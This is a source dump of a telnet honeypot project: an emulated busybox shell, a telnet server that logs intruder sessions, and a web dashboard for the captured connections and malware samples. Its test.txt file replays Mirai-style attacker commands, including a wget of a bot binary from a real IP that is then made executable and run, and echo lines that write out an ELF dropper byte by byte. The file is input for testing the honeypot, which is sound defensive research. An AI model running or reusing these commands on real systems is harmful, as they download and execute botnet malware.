self.redirect_from_f = None
self.redirect_to_f = None
self.redirect_append = False
self.shell = Proc.get("exec")
def redirect_to(self, filename):
self.redirect_to_f = filename
self.redirect_append = False
def redirect_from(self, filename):
self.redirect_from_f = filename
def redirect_app(self, filename):
self.redirect_to(filename)
self.redirect_append = True
def run(self, env):
if self.isnone():
return 0
if self.redirect_to_f != None:
if not(self.redirect_append):
env.deleteFile(self.redirect_to_f)
env = RedirEnv(env, self.redirect_to_f)
return self.shell.run(env, self.args)
def isnone(self):
return len(self.args) == 0
def __str__(self):
return "cmd(" + " ".join(self.args) + ")"
class CommandList:
def __init__(self, mode, cmd1, cmd2):
self.mode = mode
self.cmd1 = cmd1
self.cmd2 = cmd2
def redirect_to(self, filename):
self.cmd1.redirect_to(filename)
self.cmd2.redirect_to(filename)
def redirect_from(self, filename):
self.cmd1.redirect_from(filename)
self.cmd2.redirect_from(filename)
def redirect_app(self, filename):
self.cmd1.redirect_app(filename)
self.cmd2.redirect_app(filename)
def run(self, env):
ret = self.cmd1.run(env)
if (self.mode == "&&"):
if (ret == 0):
return self.cmd2.run(env)
else:
return ret
elif (self.mode == "||"):
if (ret != 0):
return self.cmd2.run(env)
else:
return ret
elif (self.mode == ";"):
if self.cmd2.isnone():
return ret
return self.cmd2.run(env)
else:
print "WARN: Bad Mode"
return 1
def isnone(self):
return self.cmd1.isnone() and self.cmd2.isnone()
def __str__(self):
return "(" + str(self.cmd1) + self.mode + str(self.cmd2) + ")"
class Actions(object):
def make_arg_noquot(self, input, start, end, elements):
return input[start:end]
def make_arg_quot(self, input, start, end, elements):
return elements[1].text
def make_list(self, input, start, end, elements):
c1 = elements[0]
if len(elements[1].elements) != 0:
c2 = elements[1].elements[3]
return CommandList(";", c1, c2)
return c1
def make_single(self, input, start, end, elements):
c1 = elements[0]
if len(elements[1].elements) != 0:
c2 = elements[1].elements[3]
op = elements[1].elements[1]
return CommandList(op.text, c1, c2)
return c1
def make_pipe(self, input, start, end, elements):
c1 = elements[0]
if len(elements[1].elements) != 0:
c2 = elements[1].elements[3]
c1.redirect_to("/dev/pipe")
c2.redirect_from("/dev/pipe")
return CommandList(";", c1, c2)
return c1
def make_redir(self, input, start, end, elements):
c = elements[0]
for redirect in elements[1].elements:
operator = redirect.elements[1].text
filename = redirect.elements[3]
if operator == ">":
c.redirect_to(filename)
elif operator == ">>":
c.redirect_app(filename)
elif operator == "<":
c.redirect_from(filename)
else:
print "WARNING: unsupported redirect operator " + operator
return c
def make_cmdbrac(self, input, start, end, elements):
return elements[2]
def make_args(self, input, start, end, elements):
if isinstance(elements[0], basestring):
r = [ elements[0] ]
else:
r = []
for arg in elements[1].elements:
if isinstance(arg.elements[1], basestring):
r.append(arg.elements[1])
c = Command(r)
return c
def run(string, env):
c = parse(filter_ascii(string).strip(), actions=Actions())
return c.run(env)
def test_shell():
env = Env()
while True:
sys.stdout.write(" # ")
sys.stdout.flush()
line = sys.stdin.readline()
if line == "":
break
if line == "\n":
continue
line = line[:-1]
tree = run(line, env)
sys.stdout.flush()
================================================
FILE: honeypot/shell/test.sh
================================================
#!/bin/bash
canopy grammar.peg --lang python && python shell.py < test.txt
================================================
FILE: honeypot/shell/test.txt
================================================
cp
ls
cat
dd
rm
echo
busybox
sh
cd
true
false
chmod
uname
:
ps
enable
shell
sh
/bin/busybox ECCHI
/bin/busybox ps; /bin/busybox ECCHI
/bin/busybox cat /proc/mounts; /bin/busybox ECCHI
/bin/busybox echo -e '\x6b\x61\x6d\x69/proc' > /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm /proc/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/sys' > /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm /sys/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/tmp' > /tmp/.nippon; /bin/busybox cat /tmp/.nippon; /bin/busybox rm /tmp/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/overlay' > /overlay/.nippon; /bin/busybox cat /overlay/.nippon; /bin/busybox rm /overlay/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69' > /.nippon; /bin/busybox cat /.nippon; /bin/busybox rm /.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev/pts' > /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm /dev/pts/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/sys/kernel/debug' > /sys/kernel/debug/.nippon; /bin/busybox cat /sys/kernel/debug/.nippon; /bin/busybox rm /sys/kernel/debug/.
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
/bin/busybox ECCHI
rm /proc/.t; rm /proc/.sh; rm /proc/.human
rm /sys/.t; rm /sys/.sh; rm /sys/.human
rm /tmp/.t; rm /tmp/.sh; rm /tmp/.human
rm /overlay/.t; rm /overlay/.sh; rm /overlay/.human
rm /.t; rm /.sh; rm /.human
rm /dev/.t; rm /dev/.sh; rm /dev/.human
rm /dev/pts/.t; rm /dev/pts/.sh; rm /dev/pts/.human
rm /sys/kernel/debug/.t; rm /sys/kernel/debug/.sh; rm /sys/kernel/debug/.human
rm /dev/.t; rm /dev/.sh; rm /dev/.human
cd /proc/
/bin/busybox cp /bin/echo dvrpelper; >dvrpelper; /bin/busybox chmod 777 dvrpelper; /bin/busybox ECCHI
/bin/busybox cat /bin/echo
/bin/busybox ECCHI
/bin/busybox wget; /bin/busybox tftp; /bin/busybox ECCHI
/bin/busybox wget http://95.215.60.17:80/bins/miraint.x86 -O - > dvrpelper; /bin/busybox chmod 777 dvrpelper; /bin/busybox ECCHI
./dvrpelper telnet.x86.bot.wget; /bin/busybox IHCCE
rm -rf upnp; > dvrpelper; /bin/busybox ECCHI
cat /proc/mounts; (/bin/busybox DFYHE || :)
echo -ne "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x28\x00\x01\x00\x00\x00\x54\x00\x01\x00\x34\x00\x00\x00\x40\x01\x00\x00\x00\x02\x00\x05\x34\x00\x20\x00\x01\x00\x28\x00\x04\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00" >> .s
echo -ne "\x00\x00\x01\x00\xf8\x00\x00\x00\xf8\x00\x00\x00\x05\x00\x00\x00\x00\x00\x01\x00\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x06\x20\xa0\xe3\x07\x00\x2d\xe9\x01\x00\xa0\xe3\x0d\x10\xa0\xe1\x66\x00\x90\xef\x0c\xd0\x8d\xe2\x00\x60\xa0\xe1\x70\x10\x8f\xe2\x10\x20\xa0\xe3" >> .s
echo -ne "\x07\x00\x2d\xe9\x03\x00\xa0\xe3\x0d\x10\xa0\xe1\x66\x00\x90\xef\x14\xd0\x8d\xe2\x4f\x4f\x4d\xe2\x05\x50\x45\xe0\x06\x00\xa0\xe1\x04\x10\xa0\xe1\x4b\x2f\xa0\xe3\x01\x3c\xa0\xe3\x0f\x00\x2d\xe9\x0a\x00\xa0\xe3\x0d\x10\xa0\xe1\x66\x00\x90\xef\x10\xd0\x8d\xe2" >> .s
echo -ne "\x00\x50\x85\xe0\x00\x00\x50\xe3\x04\x00\x00\xda\x00\x20\xa0\xe1\x01\x00\xa0\xe3\x04\x10\xa0\xe1\x04\x00\x90\xef\xee\xff\xff\xea\x4f\xdf\x8d\xe2\x00\x00\x40\xe0\x01\x70\xa0\xe3\x00\x00\x00\xef\x02\x00\x68\xab\xb1\x67\xe2\xc5\x41\x26\x00\x00\x00\x61\x65\x61" >> .s
echo -ne "\x62\x69\x00\x01\x1c\x00\x00\x00\x05\x43\x6f\x72\x74\x65\x78\x2d\x41\x35\x00\x06\x0a\x07\x41\x08\x01\x09\x02\x2a\x01\x44\x01\x00\x2e\x73\x68\x73\x74\x72\x74\x61\x62\x00\x2e\x74\x65\x78\x74\x00\x2e\x41\x52\x4d\x2e\x61\x74\x74\x72\x69\x62\x75\x74\x65\x73\x00" >> .s
echo -ne "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x54\x00\x01\x00\x54\x00\x00\x00\xa4\x00\x00\x00" >> .s
echo -ne "\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x03\x00\x00\x70\x00\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x27\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00" >> .s
echo -ne "\x00\x00\x00\x00\x00\x00\x00\x00\x1f\x01\x00\x00\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" >> .s
cat .s
/bin/busybox wget; /bin/busybox 81c46036wget; /bin/busybox echo -ne '\x0181c46036\x7f'; /bin/busybox printf '\00281c46036\177'; /bin/echo -ne '\x0381c46036\x7f'; /usr/bin/printf '\00481c46036\177'; /bin/busybox tftp; /bin/busybox 81c46036tftp;
================================================
FILE: honeypot/telnet.py
================================================
import struct
import socket
import traceback
import time
from thread import start_new_thread
from session import Session
from util.dbg import dbg
from util.config import config
class IPFilter:
def __init__(self):
self.map = {}
self.timeout = config.get("telnet_ip_min_time_between_connections")
def add_ip(self, ip):
self.map[ip] = time.time()
def is_allowed(self, ip):
self.clean()
return not(ip in self.map)
def clean(self):
todelete = []
for ip in self.map:
if self.map[ip] + self.timeout < time.time():
todelete.append(ip)
for ip in todelete:
del self.map[ip]
class Telnetd:
cmds = {}
cmds[240] = "SE - subnegoation end"
cmds[241] = "NOP - no operation"
cmds[242] = "DM - data mark"
cmds[243] = "BRK - break"
cmds[244] = "IP - interrupt process"
cmds[245] = "AO - abort output"
cmds[246] = "AYT - are you there"
cmds[247] = "EC - erase char"
cmds[248] = "EL - erase line"
cmds[249] = "GA - go ahead"
cmds[250] = "SB - subnegotiation"
cmds[251] = "WILL - positive return"
cmds[252] = "WONT - negative return"
cmds[253] = "DO - set option"
cmds[254] = "DONT - unset option"
cmds[255] = "IAC - interpret as command"
SE = 240
NOP = 241
DM = 242
BRK = 243
IP = 244
AO = 245
AYT = 246
EC = 247
EL = 248
GA = 249
SB = 250
WILL = 251
WONT = 252
DO = 253
DONT = 254
IAC = 255
# Options
NAWS = 31
def __init__(self, addr, port):
self.host = addr
self.port = port
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.do_run = True
self.ipfilter = IPFilter()
def run(self):
self.sock.bind((self.host, self.port))
self.sock.listen(10)
self.sock.settimeout(None)
dbg("Socket open on " + str(self.host) + ":" + str(self.port))
while self.do_run:
try:
self.handle()
except:
traceback.print_exc()
self.sock.close()
dbg("Socket Closed")
def handle(self):
conn = False
try:
conn, addr = self.sock.accept()
dbg("Client connected at " + str(addr))
if self.ipfilter.is_allowed(addr[0]):
self.ipfilter.add_ip(addr[0])
sess = TelnetSess(self, conn, addr)
start_new_thread(sess.loop, ())
else:
dbg("Connection limit for " + addr[0] + " exceeded, closing")
conn.close()
except:
traceback.print_exc()
def stop(self):
self.do_run = False
class TelnetSess:
def __init__(self, serv, sock, remote):
self.serv = serv
self.sock = sock
self.timeout = config.get("telnet_session_timeout")
self.maxtime = config.get("telnet_max_session_length")
self.db_id = 0
self.remote = remote
self.session = None
def loop(self):
self.session = Session(self.send_string, self.remote[0])
dbg("Setting timeout to " + str(self.timeout) + " seconds")
self.sock.settimeout(self.timeout)
try:
self.test_opt(1)
# Kill of Session if longer than self.maxtime
ts_start = int(time.time())
self.send_string("Login: ")
u = self.recv_line()
self.send_string("Password: ")
p = self.recv_line()
self.send_string("\r\nWelcome to EmbyLinux 3.13.0-24-generic\r\n")
self.session.login(u, p)
while True:
l = self.recv_line()
try:
self.session.shell(l)
except:
traceback.print_exc()
self.send_string("sh: error\r\n")
if ts_start + self.maxtime < int(time.time()):
dbg("Session too long. Killing off.")
break
except socket.timeout:
dbg("Connection timed out")
except EOFError:
dbg("Connection closed")
self.session.end()
self.sock.close()
def test_naws(self):
#dbg("TEST NAWS")
if self.test_opt(Telnetd.NAWS):
self.need(Telnetd.IAC)
self.need(Telnetd.SB)
self.need(Telnetd.NAWS)
w = self.recv_short()
h = self.recv_short()
self.need(Telnetd.IAC)
self.need(Telnetd.SE)
#dbg("TEST NAWS OK " + str(w) + "x" + str(h))
elif byte == Telnetd.WONT:
pass
#dgb("TEST NAWS FAILED")
else:
raise ValueError()
def test_linemode(self):
#dbg("TEST LINEMODE")
if self.test_opt(34):
self.need(Telnetd.IAC)
self.need(Telnetd.SE)
def test_opt(self, opt, do=True):
#dbg("TEST " + str(opt))
self.send(Telnetd.IAC)
if do:
self.send(Telnetd.DO)
else:
self.send(Telnetd.DONT)
self.send(opt)
def send(self, byte):
#if byte in Telnetd.cmds:
# dbg("SEND " + str(Telnetd.cmds[byte]))
#else:
# dbg("SEND " + str(byte))
self.sock.send(chr(byte))
def send_string(self, msg):
self.sock.send(msg)
#dbg("SEND STRING LEN" + str(len(msg)))
def recv(self):
byte = self.sock.recv(1)
if len(byte) == 0:
raise EOFError
byte = ord(byte)
#if byte in Telnetd.cmds:
# dbg("RECV " + str(Telnetd.cmds[byte]))
#else:
# dbg("RECV " + str(byte))
return byte
def recv_line(self):
line = ""
while True:
byte = self.recv()
if byte == Telnetd.IAC:
byte = self.recv()
self.process_cmd(byte)
elif byte == ord("\r"):
pass
elif byte == ord("\n"):
break
else:
line = line + chr(byte)
#dbg("RECV STRING " + line)
return line
def recv_short(self):
bytes = self.sock.recv(2)
short = struct.unpack("!H", bytes)[0]
#dbg("RECV SHORT " + str(short))
return short
def need(self, byte_need):
byte = ord(self.sock.recv(1))
#if byte in Telnetd.cmds:
# dbg("RECV " + str(Telnetd.cmds[byte]))
#else:
# dbg("RECV " + str(byte))
if byte != byte_need:
dbg("BAD " + "PROTOCOL ERROR. EXIT.")
raise ValueError()
return byte
def process_cmd(self, cmd):
if cmd == Telnetd.DO:
byte = self.recv()
self.send(Telnetd.IAC)
self.send(Telnetd.WONT)
self.send(byte)
if cmd == Telnetd.WILL or cmd == Telnetd.WONT:
byte = self.recv()
================================================
FILE: honeypot.py
================================================
import os
import sys
import signal
import json
import socket
from honeypot.telnet import Telnetd
from honeypot.client import Client
from honeypot.session import Session
from honeypot.shell.shell import test_shell
from util.dbg import dbg
from util.config import config
srv = None
def import_file(fname):
with open(fname, "rb") as fp:
client = Client()
for line in fp:
line = line.strip()
obj = json.loads(line)
if obj["type"] == "connection":
if obj["ip"] != None:
print "conn " + obj["ip"]
client.put_session(obj)
if obj["type"] == "sample":
print "sample " + obj["sha256"]
client.put_sample_info(obj)
def rerun_file(fname):
with open(fname, "rb") as fp:
for line in fp:
line = line.strip()
obj = json.loads(line)
if obj["type"] == "connection":
if obj["ip"] == None: continue
session = Session(sys.stdout.write, obj["ip"])
session.login(obj["user"], obj["pass"])
for event in obj["stream"]:
if not(event["in"]): continue
sys.stdout.write(event["data"])
session.shell(event["data"].strip())
session.end()
def signal_handler(signal, frame):
dbg('Ctrl+C')
srv.stop()
if not os.path.exists("samples"):
os.makedirs("samples")
if __name__ == "__main__":
action = None
configFile = None
i = 0
while i+1 < len(sys.argv):
i += 1
arg = sys.argv[i]
if arg == "-c":
if i+1 < len(sys.argv):
configFile = sys.argv[i+1]
print "Using config file " + configFile
i += 1
continue
else:
print "warning: expected argument after \"-c\""
else:
action = arg
if configFile:
config.loadUserConfig(configFile)
if action == None:
socket.setdefaulttimeout(15)
srv = Telnetd(config.get("telnet_addr"), config.get("telnet_port"))
signal.signal(signal.SIGINT, signal_handler)
srv.run()
elif action == "import":
fname = sys.argv[2]
import_file(fname)
elif action == "rerun":
fname = sys.argv[2]
rerun_file(fname)
elif action == "shell":
test_shell()
else:
print "Command " + action + " unknown."
================================================
FILE: html/.gitignore
================================================
db.php
apiurl.js
================================================
FILE: html/admin.html
================================================
<img src="img/icon.svg" style="height: 10em; margin-top: -4em; padding: 1em; background: white;" class="pull-right">
<div class="page-header">
<h1>Administration Area</h1>
</div>
<div class="alert alert-info" role="alert" ng-show="errormsg">{{ errormsg }}</div>
<div ng-show="!loggedin">
<h2>Login</h2>
<form>
<div class="form-group">
<label for="username">Username</label>
<input type="text" class="form-control" ng-model="username" placeholder="Username" id="username">
</div>
<div class="form-group">
<label for="password">Password</label>
<input type="password" class="form-control" ng-model="password" placeholder="Password" id="password">
</div>
<button type="submit" class="btn btn-default" ng-click="login()">Login</button>
</form>
</div>
<div ng-show="loggedin">
<h2>Add a new user</h2>
<form>
<div class="form-group">
<label for="new_username">New users name</label>
<input type="text" class="form-control" ng-model="new_username" placeholder="Username" id="new_username">
</div>
<div class="form-group">
<label for="new_password">New users password</label>
<input type="password" class="form-control" ng-model="new_password" placeholder="Password" id="new_password">
</div>
<button type="submit" class="btn btn-default" ng-click="addUser()">Add User</button>
</form>
<hr>
<form>
<button type="submit" class="btn btn-default btn-danger" ng-click="logout()">Logout</button>
</form>
</div>
================================================
FILE: html/asn.html
================================================
<h1>ASN Info</h1>
<table class="table">
<tr><td>Name</td><td><b>{{ asn.name }}</b></td></tr>
<tr><td>Country</td><td><img src="img/flags/{{ asn.country.toLowerCase() }}.png"> {{ asn.countryname }}</td></tr>
<tr><td>ASN</td><td>AS{{ asn.asn }}</td></tr>
<tr><td>Internet Registry</td><td>{{ REGISTRIES[asn.reg] }}</td></tr>
<tr><td>More Info</td><td><a href="http://bgp.he.net/AS{{ asn.asn }}" target="_blank"><span class="glyphicon glyphicon-link"></span> AS{{ asn.asn }} on bgp.he.net</a></td></tr>
</table>
<h2>Connections from AS{{ asn.asn }} <small><a href="#/connections?asn_id={{ asn.asn }}">more</a></small></h2>
<div ng-include="'connectionlist-embed.html'"></div>
<h2>URLs located in AS{{ asn.asn }}</h2>
<table class="table">
<tr><th>Connections</th><th>Url</th><th>Sample</th></tr>
<tr ng-repeat="url in asn.urls"><td>{{ url.connections }}</td><td>{{ url.url }}</td><td>{{ url.sample }}</td></tr>
</table>
<small>Coming soon</small>
================================================
FILE: html/common.js
================================================
var fakenames = ["Boar","Stallion","Yak","Beaver","Salamander","Eagle Owl","Impala","Elephant","Chameleon","Argali","Lemur","Addax","Colt","Whale","Dormouse","Budgerigar","Dugong","Squirrel","Okapi","Burro","Fish","Crocodile","Finch","Bison","Gazelle","Basilisk","Puma","Rooster","Moose","Musk Deer","Thorny Devil","Gopher","Gnu","Panther","Porpoise","Lamb","Parakeet","Marmoset","Coati","Alligator","Elk","Antelope","Kitten","Capybara","Mule","Mouse","Civet","Zebu","Horse","Bald Eagle","Raccoon","Pronghorn","Parrot","Llama","Tapir","Duckbill Platypus","Cow","Ewe","Bighorn","Hedgehog","Crow","Mustang","Panda","Otter","Mare","Goat","Dingo","Hog","Mongoose","Guanaco","Walrus","Springbok","Dog","Kangaroo","Badger","Fawn","Octopus","Buffalo","Doe","Camel","Shrew","Lovebird","Gemsbok","Mink","Lynx","Wolverine","Fox","Gorilla","Silver Fox","Wolf","Ground Hog","Meerkat","Pony","Highland Cow","Mynah Bird","Giraffe","Cougar","Eland","Ferret","Rhinoceros"];
function extractHash() {
var table = {};
var values = window.location.hash.substr(1);
values = values.split("&");
for (var i = 0; i < values.length; i++) {
var tuple = values[i].split("=");
var name = tuple[0];
var value = tuple.length > 1 ? tuple[1] : null;
table[name] = value;
}
return table;
}
function formatDate(date) {
d = new Date(date * 1000);
return d.toTimeString().replace(/.*(\d{2}:\d{2}:\d{2}).*/, "$1");
}
var months = ["Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sep", "Okt", "Nov", "Dez"];
function formatDay(date) {
d = new Date(date * 1000);
return d.getDate() + " " + months[d.getMonth()];
}
function formatDateTime(date) {
if (date == null) return "";
d = new Date(date * 1000);
return d.getDate() + "." + (d.getMonth()+1) + " " + d.toTimeString().replace(/.*(\d{2}:\d{2}):\d{2}.*/, "$1");
}
function time() {
return Math.round(new Date().getTime() / 1000);
}
function nicenull (str, el) {
if (str == null || str == "")
return el;
else
return str;
}
function short (str, l) {
if (str)
return str.substring(0, l) + "...";
else
return "None";
}
function encurl(url) {
return btoa(url);
}
function decurl(url) {
return atob(url);
}
================================================
FILE: html/connection.html
================================================
<h1>Connection Info</h1>
<table class="table">
<tr><td>Date</td><td>{{ formatDate(connection.date) }}</td></tr>
<tr><td>Duration</td><td>{{ connection.duration }} seconds</td></tr>
<tr><td>Network / Malware</td><td>
<a href="#/network/{{ connection.network.id }}">#{{ connection.network.id }}</a>
<span> / </span>
<a href="#/malware/{{ connection.network.malware.id }}">{{ connection.network.malware.name != null ? connection.network.malware.name : fakenames[connection.network.malware.id] }}</a>
</td></tr>
<!-- <tr><td>ID</td><td>{{ connection.id }}</td></tr> -->
<tr><td>Honeypot name</td><td>{{ connection.backend_user }}</td></tr>
<tr>
<td>IP</td>
<td>
<span ng-show="connection.asn"><a href="#/connections?country={{ connection.country }}"><span class="glyphicon glyphicon-screenshot"></span></a> <img src="img/flags/{{ connection.country.toLowerCase() }}.png"> {{ connection.city + ', ' + connection.countryname }} <a target="_blank" href="http://www.openstreetmap.org/?zoom=13&lat={{ connection.latitude }}&lon={{ connection.longitude }}">map</a> <br></span>
<span><a href="#/connections?ip={{ connection.ip }}"><span class="glyphicon glyphicon-screenshot"></span></a></span> {{ connection.ip }}<br>
<span ng-show="connection.asn"><a href="#/asn/{{ connection.asn.asn }}"><span class="glyphicon glyphicon-screenshot"></span></a> AS{{ connection.asn.asn }} <b>{{ connection.asn.name }}</b>
</span><br>
<span ng-show="connection.asn">{{ connection.ipblock }}</span>
</td>
</tr>
<tr><td>User : Password</td><td><a href="#/connections?user={{ connection.user }}"><span class="glyphicon glyphicon-screenshot"></span> "{{ connection.user }}"</a> : <a href="#/connections?password={{ connection.password }}">"{{ connection.password }}" <span class="glyphicon glyphicon-screenshot"></span></a></td></tr>
<tr ng-show="connection.conns_before.length > 0">
<td>Prior Connections</td>
<td>
<p ng-repeat="associate in connection.conns_before">
<a href="{{ '#/connection/' + associate.id }}">{{ formatDate(associate.date) }}</a> from
<img src="img/flags/{{ associate.country.toLowerCase() }}.png"> {{ associate.ip }}
</p>
</td>
</tr>
<tr ng-show="connection.conns_after.length > 0">
<td>Subsequent Connections</td>
<td>
<p ng-repeat="associate in connection.conns_after">
<a href="{{ '#/connection/' + associate.id }}">{{ formatDate(associate.date) }}</a> from
<img src="img/flags/{{ associate.country.toLowerCase() }}.png"> {{ associate.ip }}
</p>
</td>
</tr>
<tr ng-show="connection.tags.length > 0">
<td>Tags</td>
<td>
<a class="btn btn-default btn-xs" ng-repeat="tag in connection.tags" style="margin-right: 1em;" href="#/tag/{{ tag.name }}" data-toggle="tooltip" title="{{ tag.code }}">{{ tag.name }}</a>
</td>
</tr>
</table>
<div ng-show="connection.urls.length > 0">
<h2>URLs gathered</h2>
<table class="table">
<tr>
<th>Url</th>
<th>First Seen</th>
<th>Sample</th>
</tr>
<tr ng-repeat="url in connection.urls">
<td><a href="{{ '#/url/' + encurl(url.url) }}">{{ url.url }}</a></td>
<td>{{ formatDate(url.date) }}</td>
<td><a href="{{ '#/sample/' + url.sample }}">{{ short(url.sample, 16) }}</a></td>
</tr>
</table>
</div>
<div ng-show="connection.text_combined != ''">
<h2>Session text <small> show output <input type="checkbox" ng-model="displayoutput"></small></h2>
<div class="well well-sm code">
<div style="font-size: 0.7em;">Session Text does not include non-ascii characters</div>
<span class="code-line" ng-show="displayoutput || event.in" ng-class="{ isinput: event.in }" ng-repeat="event in connection.stream" title="after {{ event.ts }} s">{{ event.data }}</span>
</div>
</div>
================================================
FILE: html/connectionlist-embed.html
================================================
<table class="table table-condensed">
<tr>
<th>Date</th>
<th ng-show="!filter['ip']">IP</th>
<th ng-show="!filter['asn_id']">ASN</th>
<th ng-show="!filter['country']">Country</th>
<th>Username</th>
<th>Password</th>
<th>N⁰ Urls</th>
</tr>
<tr ng-repeat="connection in connections">
<td><a href="{{ '#/connection/' + connection.id }}">{{ formatDate(connection.date) }}</a></td>
<td ng-show="!filter['ip']"> {{ connection.ip }} <a href="#/connections?ip={{ connection.ip }}"><span class="glyphicon glyphicon-screenshot"></a></td>
<td ng-show="!filter['asn_id']">{{ connection.asn.asn }} <a href="#/asn/{{ connection.asn.asn }}"><span class="glyphicon glyphicon-screenshot"></a></td>
<td ng-show="!filter['country']"><img src="img/flags/{{ connection.country.toLowerCase() }}.png"> {{ connection.country }} <a href="#/connections?country={{ connection.country }}"><span class="glyphicon glyphicon-screenshot"></span></a></td>
<td>{{ connection.user }} <a href="#/connections?user={{ connection.user }}"><span class="glyphicon glyphicon-screenshot"></span></a></td>
<td>{{ connection.password }} <a href="#/connections?password={{ connection.password }}"><span class="glyphicon glyphicon-screenshot"></span></td>
<td>{{ connection.urls }}</td>
</tr>
</table>
================================================
FILE: html/connectionlist.html
================================================
<h2>Connections</h2>
<div class="well well-sm" style="font-family: monospace">
<div style="font-size: 0.7em;">
Filters:
<button style="background:none; border:none; margin:0; padding:0;" type="button" data-toggle="collapse" data-target="#collapseExample" aria-expanded="false" aria-controls="collapseExample">
<span class="glyphicon glyphicon-info-sign"></span>
</button>
<div class="collapse" id="collapseExample">
<p>You may use the url bar to edit filters</p>
<p>Available arguments: ["ipblock", "user", "password", "ip", "country", "asn_id"]</p>
</div>
</div>
<span ng-repeat="(k, v) in filter">{{ k }} == <img ng-show="k == 'country'" src="img/flags/{{ v.toLowerCase() }}.png"> {{ v }} {{ k == 'country' ? '(' + COUNTRY_LIST[v] + ')' : '' }} {{ $last ? '' : ', ' }}</span>
</div>
<div ng-include="'connectionlist-embed.html'"></div>
<div class="pull-right">
<button type="button" class="btn btn-default" ng-click="nextpage()">More »</button>
</div>
================================================
FILE: html/countries.js
================================================
var COUNTRY_LIST = {"AF":"Afghanistan","AX":"Åland Islands","AL":"Albania","DZ":"Algeria","AS":"American Samoa","AD":"AndorrA","AO":"Angola","AI":"Anguilla","AQ":"Antarctica","AG":"Antigua and Barbuda","AR":"Argentina","AM":"Armenia","AW":"Aruba","AU":"Australia","AT":"Austria","AZ":"Azerbaijan","BS":"Bahamas","BH":"Bahrain","BD":"Bangladesh","BB":"Barbados","BY":"Belarus","BE":"Belgium","BZ":"Belize","BJ":"Benin","BM":"Bermuda","BT":"Bhutan","BO":"Bolivia","BA":"Bosnia and Herzegovina","BW":"Botswana","BV":"Bouvet Island","BR":"Brazil","IO":"British Indian Ocean Territory","BN":"Brunei Darussalam","BG":"Bulgaria","BF":"Burkina Faso","BI":"Burundi","KH":"Cambodia","CM":"Cameroon","CA":"Canada","CV":"Cape Verde","KY":"Cayman Islands","CF":"Central African Republic","TD":"Chad","CL":"Chile","CN":"China","CX":"Christmas Island","CC":"Cocos (Keeling) Islands","CO":"Colombia","KM":"Comoros","CG":"Congo","CD":"Congo, The Democratic Republic of the","CK":"Cook Islands","CR":"Costa Rica","CI":"Cote D'Ivoire","HR":"Croatia","CU":"Cuba","CY":"Cyprus","CZ":"Czech Republic","DK":"Denmark","DJ":"Djibouti","DM":"Dominica","DO":"Dominican Republic","EC":"Ecuador","EG":"Egypt","SV":"El Salvador","GQ":"Equatorial Guinea","ER":"Eritrea","EE":"Estonia","ET":"Ethiopia","FK":"Falkland Islands (Malvinas)","FO":"Faroe Islands","FJ":"Fiji","FI":"Finland","FR":"France","GF":"French Guiana","PF":"French Polynesia","TF":"French Southern Territories","GA":"Gabon","GM":"Gambia","GE":"Georgia","DE":"Germany","GH":"Ghana","GI":"Gibraltar","GR":"Greece","GL":"Greenland","GD":"Grenada","GP":"Guadeloupe","GU":"Guam","GT":"Guatemala","GG":"Guernsey","GN":"Guinea","GW":"Guinea-Bissau","GY":"Guyana","HT":"Haiti","HM":"Heard Island and Mcdonald Islands","VA":"Holy See (Vatican City State)","HN":"Honduras","HK":"Hong Kong","HU":"Hungary","IS":"Iceland","IN":"India","ID":"Indonesia","IR":"Iran, Islamic Republic Of","IQ":"Iraq","IE":"Ireland","IM":"Isle of Man","IL":"Israel","IT":"Italy","JM":"Jamaica","JP":"Japan","JE":"Jersey","JO":"Jordan","KZ":"Kazakhstan","KE":"Kenya","KI":"Kiribati","KP":"Korea, Democratic People'S Republic of","KR":"Korea, Republic of","KW":"Kuwait","KG":"Kyrgyzstan","LA":"Lao People'S Democratic Republic","LV":"Latvia","LB":"Lebanon","LS":"Lesotho","LR":"Liberia","LY":"Libyan Arab Jamahiriya","LI":"Liechtenstein","LT":"Lithuania","LU":"Luxembourg","MO":"Macao","MK":"Macedonia, The Former Yugoslav Republic of","MG":"Madagascar","MW":"Malawi","MY":"Malaysia","MV":"Maldives","ML":"Mali","MT":"Malta","MH":"Marshall Islands","MQ":"Martinique","MR":"Mauritania","MU":"Mauritius","YT":"Mayotte","MX":"Mexico","FM":"Micronesia, Federated States of","MD":"Moldova, Republic of","MC":"Monaco","MN":"Mongolia","MS":"Montserrat","MA":"Morocco","MZ":"Mozambique","MM":"Myanmar","NA":"Namibia","NR":"Nauru","NP":"Nepal","NL":"Netherlands","AN":"Netherlands Antilles","NC":"New Caledonia","NZ":"New 